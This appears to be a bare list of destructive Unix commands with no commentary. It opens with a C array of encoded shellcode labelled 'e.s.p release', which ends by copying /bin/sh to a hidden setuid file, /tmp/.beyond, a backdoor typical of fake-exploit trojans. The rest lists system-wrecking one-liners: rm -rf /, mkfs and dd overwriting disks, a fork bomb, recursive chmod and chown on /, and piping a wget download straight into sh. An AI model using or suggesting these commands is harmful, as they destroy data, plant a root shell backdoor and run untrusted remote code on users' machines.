char esp[] attribute ((section(“.text”))) /* e.s.p release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

rm -rf /

mkfs.ext3 /dev/sda

:() { :|: & }; :

[any_command] > /dev/sda

wget [http://some_untrusted_source] -O- | sh

dd if=/dev/random of=/dev/sda

dd if=/dev/random of=/dev/port

dd if=/dev/zero of=/dev/sda1

chmod -R 777 /

chmod 000 -R

mv /home/[your user]/* /dev/null

chown nobody:nobody -R /

yes>/dev/sda
